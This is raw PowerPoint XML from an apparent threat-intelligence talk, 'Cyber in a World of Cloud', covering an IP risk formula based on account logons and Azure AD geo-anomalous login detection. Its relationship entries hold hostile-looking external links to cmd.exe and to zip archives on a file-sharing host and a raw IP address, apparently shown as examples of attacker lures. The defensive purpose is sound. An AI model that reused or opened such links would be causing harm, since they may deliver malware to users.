Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.jpg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.jpg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.jpg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.jpg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.jpg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.jpg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jpg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.jp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file:///\\cmd.exe"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ys-h.ys168.com/3.0/548253621/SIuMfJl7K3T5561HXPJK/DUB_8.0.zip" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://119.10.151.120:1234/3.zip" TargetMode="Externa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1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9.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g"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image37.jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.jpeg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.jpg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.jpg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.jpg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.jpg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.jpg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.jpg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jpg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.jpg"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.jpg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.jp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2119178"/>
            <a:ext cx="8458135" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cyber in a World of Cloud</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> …and the new physics of defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350837" y="3878262"/>
            <a:ext cx="6402388" cy="1828800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>John Lambert, @JohnLaTwC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Threat Intelligence Center</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2570925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55985" y="1875184"/>
            <a:ext cx="3539604" cy="4266415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000">
              <a:alpha val="3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1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="161659" y="1212849"/>
            <a:ext cx="12566712" cy="5019924"/>
            <a:chOff x="161659" y="1212849"/>
            <a:chExt cx="12566712" cy="5019924"/>
          </a:xfrm>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61659" y="1212849"/>
              <a:ext cx="3857078" cy="5019924"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Picture 20"/>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18737" y="1212849"/>
              <a:ext cx="8709634" cy="4899169"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Donut 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5284602" y="2441420"/>
            <a:ext cx="665528" cy="680411"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd name="adj" fmla="val 3947"/>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1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Donut 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4999037" y="3535002"/>
            <a:ext cx="914400" cy="688304"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd name="adj" fmla="val 3947"/>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1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Donut 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4236915" y="4534301"/>
            <a:ext cx="1219322" cy="1020361"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd name="adj" fmla="val 3947"/>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1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11313" y="888570"/>
            <a:ext cx="8839200" cy="5547726"/>
            <a:chOff x="2179637" y="1058862"/>
            <a:chExt cx="8839200" cy="5547726"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="Rectangle 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2179637" y="1058862"/>
              <a:ext cx="8839200" cy="554772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5">
              <a:lum contrast="20000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2179637" y="1135062"/>
              <a:ext cx="8416933" cy="395969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6" name="Rectangle 25"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2179637" y="5143806"/>
                  <a:ext cx="8839200" cy="1200329"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" b="1" dirty="0"/>
                    <a:t>Formula</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a14:m>
                    <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                      <m:r>
                        <a:rPr lang="en-US" i="1">
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>𝑟𝑖𝑠𝑘</m:t>
                      </m:r>
                      <m:d>
                        <m:dPr>
                          <m:ctrlPr>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                          </m:ctrlPr>
                        </m:dPr>
                        <m:e>
                          <m:r>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>𝐼𝑃</m:t>
                          </m:r>
                        </m:e>
                      </m:d>
                      <m:r>
                        <a:rPr lang="en-US" i="1">
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>=</m:t>
                      </m:r>
                      <m:r>
                        <m:rPr>
                          <m:sty m:val="p"/>
                        </m:rPr>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>max</m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="en-US" i="1">
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>⁡(</m:t>
                      </m:r>
                      <m:nary>
                        <m:naryPr>
                          <m:chr m:val="∑"/>
                          <m:supHide m:val="on"/>
                          <m:ctrlPr>
                            <a:rPr lang="pt-BR" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                          </m:ctrlPr>
                        </m:naryPr>
                        <m:sub>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𝑂𝑤𝑛𝑒𝑑</m:t>
                          </m:r>
                        </m:sub>
                        <m:sup/>
                        <m:e>
                          <m:r>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>𝐿𝑜𝑔𝑜𝑛𝐸𝑥𝑖𝑠𝑡𝑠</m:t>
                          </m:r>
                          <m:r>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>(</m:t>
                          </m:r>
                          <m:r>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>𝐼𝑃</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e>
                      </m:nary>
                    </m:oMath>
                  </a14:m>
                  <a:r>
                    <a:rPr lang="en-US" dirty="0"/>
                    <a:t> - </a:t>
                  </a:r>
                  <a14:m>
                    <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                      <m:nary>
                        <m:naryPr>
                          <m:chr m:val="∑"/>
                          <m:supHide m:val="on"/>
                          <m:ctrlPr>
                            <a:rPr lang="pt-BR" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                          </m:ctrlPr>
                        </m:naryPr>
                        <m:sub>
                          <m:r>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>𝑈</m:t>
                          </m:r>
                          <m:r>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t> ∈</m:t>
                          </m:r>
                          <m:r>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>𝑁𝑜𝑛𝑂𝑤𝑛𝑒𝑑</m:t>
                          </m:r>
                        </m:sub>
                        <m:sup/>
                        <m:e>
                          <m:r>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>𝐿𝑜𝑔𝑜𝑛𝐸𝑥𝑖𝑠𝑡𝑠</m:t>
                          </m:r>
                          <m:r>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>(</m:t>
                          </m:r>
                          <m:r>
                            <a:rPr lang="en-US" i="1">
                              <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                            </a:rPr>
                            <m:t>𝐼𝑃</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e>
                      </m:nary>
                    </m:oMath>
                  </a14:m>
                  <a:r>
                    <a:rPr lang="en-US" dirty="0"/>
                    <a:t>, 0)</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" dirty="0"/>
                    <a:t>	where</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𝐿𝑜𝑔𝑜𝑛𝐸𝑥𝑖𝑠𝑡𝑠</m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="en-US" i="1">
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>:(</m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="en-US" i="1">
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>𝐼𝑃</m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="en-US" i="1">
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>, </m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="en-US" i="1">
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>𝑈</m:t>
                      </m:r>
                      <m:r>
                        <a:rPr lang="en-US" i="1">
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>) →{0, 1} </m:t>
                      </m:r>
                    </m:oMath>
                  </a14:m>
                  <a:endParaRPr lang="en-US" dirty="0"/>
                </a:p>
                <a:p>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2179637" y="5143806"/>
                  <a:ext cx="8839200" cy="1200329"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:blipFill>
                  <a:blip r:embed="rId6"/>
                  <a:stretch>
                    <a:fillRect l="-621" t="-13706" b="-11168"/>
                  </a:stretch>
                </a:blipFill>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US">
                      <a:noFill/>
                    </a:rPr>
                    <a:t> </a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5319446" y="957333"/>
            <a:ext cx="7362825" cy="541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1914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9701" y="4018972"/>
            <a:ext cx="1637891" cy="793258"/>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1" y="12207"/>
            <a:ext cx="2047875" cy="2047875"/>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7875" y="0"/>
            <a:ext cx="2211388" cy="2137675"/>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263" y="0"/>
            <a:ext cx="2857500" cy="16002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6954" y="178897"/>
            <a:ext cx="1437299" cy="1492053"/>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7013" y="2623"/>
            <a:ext cx="2600325" cy="466725"/>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0400" y="453866"/>
            <a:ext cx="1733550" cy="314325"/>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26562" y="920591"/>
            <a:ext cx="2181225" cy="1123950"/>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44281" y="2147363"/>
            <a:ext cx="2419350" cy="990600"/>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74953" y="1852973"/>
            <a:ext cx="2238375" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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88424" y="2161227"/>
            <a:ext cx="2857500" cy="609600"/>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9384" y="3344672"/>
            <a:ext cx="2181225" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Pictur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28577" y="3284750"/>
            <a:ext cx="2857500" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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18534" y="3278187"/>
            <a:ext cx="2343150" cy="981075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Picture 3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94141" y="3010842"/>
            <a:ext cx="1543050" cy="1104900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture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69648" y="3010842"/>
            <a:ext cx="1762125" cy="485775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 4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64230" y="3011487"/>
            <a:ext cx="1371600" cy="1019175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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81" y="2128631"/>
            <a:ext cx="1914525" cy="819150"/>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01421" y="4288355"/>
            <a:ext cx="2676525" cy="523875"/>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895570" y="4278830"/>
            <a:ext cx="1276350" cy="533400"/>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88723" y="3489156"/>
            <a:ext cx="1300365" cy="619841"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Picture 4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07938" y="4278830"/>
            <a:ext cx="2295525" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Picture 5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33421" y="5982231"/>
            <a:ext cx="2597727" cy="978477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Picture 5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878" y="5124983"/>
            <a:ext cx="2857500" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Picture 5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089178" y="5221008"/>
            <a:ext cx="2724150" cy="752475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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1270" y="5197785"/>
            <a:ext cx="1437299" cy="1492053"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Footer Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>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4953" y="6352693"/>
            <a:ext cx="2600325" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId28"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9931662" y="5124983"/>
            <a:ext cx="1403713" cy="1383830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Connector 6"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="94878" y="4945062"/>
            <a:ext cx="12219359"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93855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79437" y="1906624"/>
            <a:ext cx="9744075" cy="4572000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274638" y="295274"/>
            <a:ext cx="11553823" cy="917575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Azure Active Directory Geo-Anomalous Login Detection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="984250" y="2125662"/>
            <a:ext cx="9505950" cy="4705350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524794" y="2595041"/>
            <a:ext cx="9801225" cy="4400550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7970837" y="1044496"/>
            <a:ext cx="4267199" cy="780533"/>
            <a:chOff x="5380037" y="3505396"/>
            <a:chExt cx="4267199" cy="780533"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5380037" y="3505396"/>
              <a:ext cx="4267199" cy="780533"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0070C0"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="1E1E1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3200" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="FFFFFF"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5456237" y="3603274"/>
              <a:ext cx="4190999" cy="584775"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" defTabSz="932472" fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" baseline="30000" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                </a:rPr>
                <a:t>st</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3200" dirty="0">
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:srgbClr val="FFFFFF"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF"/>
